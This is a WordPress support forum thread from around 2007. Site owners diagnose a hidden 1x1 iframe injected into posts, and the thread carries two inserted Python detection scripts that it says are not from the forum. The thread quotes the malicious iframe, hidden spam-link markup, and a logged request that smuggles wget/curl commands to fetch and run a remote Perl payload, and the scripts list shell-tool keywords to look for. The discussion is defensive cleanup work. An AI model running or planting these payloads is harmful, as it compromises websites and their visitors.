iframe injection problem? (92 posts)

  1. lostplay
    Member
    Posted 10 months ago #

    Hi,

    I've searched around for a resolution to my problem but the closest thread I can find is this: http://wordpress.org/support/topic/89912?replies=4

    Basically, about a week ago my site began experiencing problems whenever I tried to access the home page http://www.heroes-hype.com. The screen just freezes for about 10 minutes... sometimes it also throws me out (closes the browser). In the browser footer it displays the following:

    waiting for http://xx.xx.xx.xx./iframe/wp-stats.php

    (the 'x' is an IP address which I don't recognise)

    At first I suspected that it was a problem with the wp-stats plugin which I had just installed prior to this problem surfacing. So I removed the plugin (and other plugins)... I also tried other themes and browsers, but a week later the problem still remains.

    So I contacted my host (as one of the threads here suggested I do) and they have reported to me the following:

    "Your site was most likely injected with a 1px iframe due to a vulnerability in WordPress -- which is why 2.2.3 was rushed out and pushed out to everyone. A number of sites have the same link which leads one to believe it was due to an exploit in either Wordpress itself or the theme you're using (which has also been called into question as of late)."

    So now I'm wondering whether anyone can corroborate that this is the likely reason... and whether there is anything I can do to resolve the problem. I would of course like to upgrade to 2.3 asap, but I doubt this will solve the issue in itself... or will it?

    Any advice would be much appreciated.

    PS I am using the CSS Freak theme.

  2. whooami
    Member
    Posted 10 months ago #

    what is the xx.xx...

    and you say the problem persists, after removing the stats plugin? I don't see the code on your site.

    Without seeing the xx.xx.xx.xx.. its hard to say much.

  3. whooami
    Member
    Posted 10 months ago #

    http://61.132.75.71/iframe/wp-stats.php

    that? that goes to China, that's prolly not good.

  4. lostplay
    Member
    Posted 10 months ago #

    Hi,

    Yes, that's the IP address..

    Yep, I removed the wp-stats plugin because I originally assumed it was at fault and because I wanted to ensure that I had covered the basics before asking for advice.

    Thanks for the feedback - do you (or anyone else) have any ideas on how to resolve this?

  5. whooami
    Member
    Posted 10 months ago #

    it's not on your single post pages... have you looked inside your theme files? I would start there with looking at index.php

    Look inside THIS post:

    http://heroes-hype.com/heroes-clues-global-tv-promo

  6. Otto42
    Moderator
    Posted 10 months ago #

    Step 1: Find where the code is being inserted. From what whooami is saying, it's likely inside the content of one specific post. So look through that post and find and remove it.

    Step 2: Upgrade to the current latest WordPress version (2.2.3). This has no known security issues at this time.

    Step 3: Keep up to date on WordPress releases. On the main dashboard, you'll always see new release information. Also, in WordPress 2.3 and up, WordPress itself will start telling you when your version is out of date and give you info on how to upgrade. So that will be good.

    Given that the code is inside a post's content, then I'd say yeah, they likely did it through the exploit in version 2.2. Upgrade to 2.2.3, right now.

  7. lostplay
    Member
    Posted 10 months ago #

    whooami - you're a star! There was the following iframe inside that post:

    <!-- Traffic Statistics -->
    <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
    <!-- End Traffic Statistics -->

    So does this mean they were attempting to track my stats/traffic? Hmm..very nasty stuff. I have now removed it from that post.

    Otto42 - thank you for your help and advice also! I'm going to do as you advise and upgrade asap.

    Thanks again, I suspect that you have both saved me hours of stress!

  8. whooami
    Member
    Posted 10 months ago #

    So does this mean they were attempting to track my stats/traffic?

    who knows, it would almost be interesting to make up a site that forges a referer that's a wp blog and see if anything can be figured out. I really can't see any way that they can glean anything worthwhile.

  9. lostplay
    Member
    Posted 10 months ago #

    Hmm, it's a strange one indeed. Anyway thanks for the heads-up :)

  10. Toread
    Member
    Posted 8 months ago #

    Happened today on 2.3.1 site. The injected code was:
    <!-- Traffic Statistics -->
    <iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
    <!-- End Traffic Statistics -->

    Inside wp-stats.php is JavaScript code. Host 61.132.75.71 is in China. When can we expect a patch?

  11. scchu
    Member
    Posted 8 months ago #

    Yup. The same thing happened to me. Running 2.3. I thought it must've been an exploit for 2.3. But it turns out 2.3.1 is also vulnerable. I am not feeling too comfortable with this actually. And I just noticed it in a post I did 2 days ago!! Now I gotta go back and dig them out... Argh...

  12. daxman
    Member
    Posted 8 months ago #

    Happened to me too.

  13. Columcille
    Member
    Posted 8 months ago #

    Glad to find others discussing this. I've just noticed the same thing turning up in my blog, running v2.3. Was about to update to 2.3.1 but I see from comments on here that it is vulnerable as well.

    Any idea what hole these are crawling through?

  14. Columcille
    Member
    Posted 8 months ago #

  15. dd32
    Member
    Posted 8 months ago #

    Can anyone take a read through their webservers access logs and look for anything suspect accessing the admin pages?
    Also check for other users, and change the admin passwords.
    It is hard to work out what is happening here without knowing where the problem is coming from.

  16. lloydbudd
    Moderator
    Posted 8 months ago #

    Inserting an iframe of that style is the common injection by at least one black hat SEO ring -- I've heard of that injection http://xx.xx.xx.xx./iframe/wp-stats.php being on a Joomla! site.

    Columcille, it's still advisable to upgrade to 2.3.1 as it does address security issues. Including what WP theme, plugins, and other s/w is running on your host will help isolate the vector of the exploit.

  17. Columcille
    Member
    Posted 8 months ago #

    Didn't mean to imply that I was going to delay an update. :) I did update to 1.3.1 but from other comments it seems to have the same problem.

    I've just done a little digging in my logs but haven't spotted anything yet. I'll keep looking.

  18. fermuned
    Member
    Posted 8 months ago #

    I suffer the same iframe injection using WP 2.2.2

    The iframe code was inserted inside the last post (I think that could be important), and looking at the server logs nobody accessed the admin part of WP nor the single page of the affected post.

    The strangest lines of the server logs are:
    1.-GET //wp-pass.php?_wp_http_referer=http://201.37.71.117:8090/tool25.txt?&cmd=cd%20/tmp;rm%20x.txt;wget%20http://201.37.71.117:8090/x.txt;fetch%20http://201.37.71.117:8090/x.txt;lwp-download%20http://201.37.71.1175:8090/x.txt;curl%20-O%20http://201.37.71.117:8090/x.txt;lynx%20http://201.37.71.117:8090/x.txt;perl%20x.txt HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"
    2.-"OPTIONS / HTTP/1.1" 200 27903 "-" "Microsoft Data Access Internet Publishing Provider Cache Manager"
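A way to do the log search dd32 asked for, added here as an example that is not from this thread or from WordPress: it parses Apache combined-format lines (the format assumed for the lines quoted above) and flags requests to admin/login endpoints, shell commands smuggled into a query string like the wp-pass.php request above, external _wp_http_referer values, and unusual methods. The sample lines are constructed with TEST-NET addresses.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format, which the lines quoted in this thread appear to follow (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# Indicators modelled on the request fermuned quoted: shell commands smuggled into a query string.
SHELL_HINTS = ("cmd=", "wget ", "curl ", "fetch ", "lwp-download", "perl ", "/tmp", ";rm ")
# Endpoints where an unexpected visitor matters (dd32's advice: watch the admin pages).
WATCHED_PATHS = ("/wp-admin/", "/wp-login.php", "/wp-pass.php", "/xmlrpc.php")

def classify(line):
    """Return the reasons a log line looks suspicious; an empty list means nothing was found."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    # Decode %20 etc. and collapse leading slashes so "//wp-pass.php" is seen as "/wp-pass.php".
    path = "/" + unquote(m.group("path")).lstrip("/")
    if path.startswith(WATCHED_PATHS):
        reasons.append("admin/auth endpoint: " + path.split("?")[0])
    hits = [h for h in SHELL_HINTS if h in path]
    if hits:
        reasons.append("shell command in query: " + ", ".join(hits))
    if "_wp_http_referer=http" in path:
        reasons.append("external _wp_http_referer (open-redirect probe)")
    if m.group("method") not in ("GET", "POST", "HEAD"):
        reasons.append("unusual method " + m.group("method"))
    return reasons

def scan(lines):
    """Return (line number, reasons) for every suspicious line."""
    flagged = []
    for n, line in enumerate(lines, 1):
        reasons = classify(line)
        if reasons:
            flagged.append((n, reasons))
    return flagged

# Constructed sample log (TEST-NET addresses), modelled on the two lines quoted above.
SAMPLE_LOG = [
    '198.51.100.5 - - [06/Dec/2007:10:01:02 +0000] "GET /2007/12/06/some-post/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [06/Dec/2007:10:02:15 +0000] "GET //wp-pass.php?_wp_http_referer=http://203.0.113.7:8090/tool.txt?'
    '&cmd=cd%20/tmp;rm%20x.txt;wget%20http://203.0.113.7:8090/x.txt;perl%20x.txt HTTP/1.1" 302 - "-" "Mozilla/3.0 (compatible; Indy Library)"',
    '203.0.113.9 - - [06/Dec/2007:10:02:16 +0000] "OPTIONS / HTTP/1.1" 200 27903 "-" "Microsoft Data Access Internet Publishing Provider Cache Manager"',
]
```

Run `scan(SAMPLE_LOG)` over your own access log lines; a 302 on wp-pass.php with a query string like the one above is the line worth correlating with the post's modification time.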

  19. aNieto2k
    Member
    Posted 8 months ago #

    I tried to use this code to inject something into posts, but I can't.

    I found a bad behaviour in the redirect: is it possible to redirect to another site?

    http://youtblog.com?_wp_http_referer=http://www.google.com

    Why??

    I modified wp_sanitize_redirect() to make the redirection more restrictive.

    function wp_sanitize_redirect($location) {
        // Drop every character a URL does not legitimately need.
        $location = preg_replace('|[^a-z0-9-~+_.?#=&;,/:%]|i', '', $location);
        $location = wp_kses_no_null($location);

        /* Only redirections into the blog: an absolute URL must begin with the
           blog's own home URL, otherwise send the visitor to the home page. */
        if (stristr($location, 'http://')
            && strpos(strtolower($location), strtolower(get_option('home'))) !== 0) {
            return get_option('home');
        }

        // Remove %0d and %0a from location (CR/LF would allow header injection).
        $strip = array('%0d', '%0a');
        $found = true;
        while ($found) {
            $found = false;
            foreach ($strip as $val) {
                while (strpos($location, $val) !== false) {
                    $found = true;
                    $location = str_replace($val, '', $location);
                }
            }
        }
        return $location;
    }

    Sorry for my English.

  20. pishmishy
    Member
    Posted 7 months ago #

    If you've been affected by this issue it would be very helpful if you can search through any MySQL logs you have to see if we can pin down where the code was inserted into the database.

    See http://trac.wordpress.org/ticket/5313

  21. Mdkart
    Member
    Posted 7 months ago #

    Same problem! Major security issue!

  22. pishmishy
    Member
    Posted 7 months ago #

    Mdkart, do you have any logs that may be useful to us?

  23. voiceofbragg
    Member
    Posted 7 months ago #

    I think my site got one also, if you see some funky stuff

  24. pishmishy
    Member
    Posted 7 months ago #

    voiceofbragg, do you have logs from MySQL that may help us here?

  25. moshu
    Moderator
    Posted 7 months ago #

    Nope, he's just spamming the forum... [links from his post were deleted]

  26. Mdkart
    Member
    Posted 7 months ago #

    > pishmishy
    No mysql logs, I can't access them on my server :(

  27. laslo
    Member
    Posted 7 months ago #

    I just found some code injected in a post from dec. 6th
    http://sintonizando.com/2007/12/06/ulrich-schnauss-elika-y-project-skyward-en-vivo-en-lima/

    some spam links hidden by this:

    <font style="position: absolute;overflow: hidden;height: 0;width: 0">

    I'm on WP 2.2
    Any ideas what to fix, or what to update?
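An added example (not from this thread or from WordPress) that finds the two injections quoted in this thread in post content: the 1x1 wp-stats.php iframe from posts 7 and 10 and the zero-size font wrapper hiding spam links from post 27. It generalises to any tiny iframe and any zero-size or hidden wrapper; the sample rows are constructed stand-ins for wp_posts.

```python
import re
# Regexes for this thread's two injection styles (constructed; not WordPress code).
# 1. An invisible iframe, optionally wrapped in the "Traffic Statistics" comments.
IFRAME_RE = re.compile(
    r'(<!--\s*Traffic Statistics\s*-->\s*)?'
    r'<iframe\b[^>]*\bsrc=["\']?([^\s"\'>]+)[^>]*>\s*</iframe>'
    r'(\s*<!--\s*End Traffic Statistics\s*-->)?', re.I)
# 2. A wrapper styled to be invisible (zero size / hidden) that conceals spam links.
HIDDEN_RE = re.compile(
    r'<(font|div|span)\b[^>]*style=["\'][^"\']*'
    r'(height:\s*0|width:\s*0|display:\s*none|visibility:\s*hidden)[^"\']*["\'][^>]*>.*?</\1>',
    re.I | re.S)

def is_tiny(tag):
    """True if an iframe tag declares a 1x1 or 0x0 size, the classic invisible frame."""
    w = re.search(r'\bwidth=["\']?(\d+)', tag, re.I)
    h = re.search(r'\bheight=["\']?(\d+)', tag, re.I)
    return bool(w and h and int(w.group(1)) <= 1 and int(h.group(1)) <= 1)

def is_bad_iframe(m):
    """A match is an injection if the frame is invisible or points at a wp-stats.php loader."""
    return is_tiny(m.group(0)) or "wp-stats.php" in m.group(2).lower()

def find_injections(html):
    """Return (kind, detail) for each injection found in one post body."""
    findings = [("hidden-iframe", m.group(2)) for m in IFRAME_RE.finditer(html) if is_bad_iframe(m)]
    findings += [("hidden-block", m.group(0)[:60]) for m in HIDDEN_RE.finditer(html)]
    return findings

def clean(html):
    """Strip injected iframes; hidden blocks are only reported, since they need a human look."""
    return IFRAME_RE.sub(lambda m: "" if is_bad_iframe(m) else m.group(0), html)

def scan_posts(posts):
    # Map post ID -> findings for every post body that carries an injection.
    report = {}
    for pid, body in posts.items():
        hits = find_injections(body)
        if hits:
            report[pid] = hits
    return report

# Constructed sample rows standing in for SELECT ID, post_content FROM wp_posts.
POSTS = {
    102: ("<p>Promo video below.</p>\n<!-- Traffic Statistics -->\n"
          "<iframe src=http://192.0.2.10/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>\n"
          "<!-- End Traffic Statistics -->"),
    103: ('<p>Live in Lima.</p><font style="position: absolute;overflow: hidden;height: 0;width: 0">'
          '<a href="http://spam.example/">cheap pills</a></font>'),
    104: '<iframe src="https://www.youtube.com/embed/xyz" width="560" height="315"></iframe>',
}
```

Post 104 is the control: a normally sized embed is left alone, so the scanner can be run over every row without flagging legitimate video embeds.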

  28. theapparatus
    Member
    Posted 7 months ago #

    Any ideas what to fix, or what to update?

    I'd just update the install as you're a few versions behind. It's up to 2.3.1 now.

  29. cbdilger
    Member
    Posted 7 months ago #

    I just found a post with this code injected with WP 2.2.3. I'm upgrading to 2.3.1 now and have contacted my ISP to see if MySQL logs are available. (Edit: no, logs aren't available; darned shared hosting.)

    Plugins:
    Edit Comments 0.3 beta
    Filosofo Comments Preview 0.7
    Spam Karma 2 2.2 r3

    Theme:
    extensively hacked version of kubrick

  30. Urosino
    Member
    Posted 7 months ago #

    Damn, I am having same problem. Just realized this in my source code:

    <!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

    Any solution yet!?
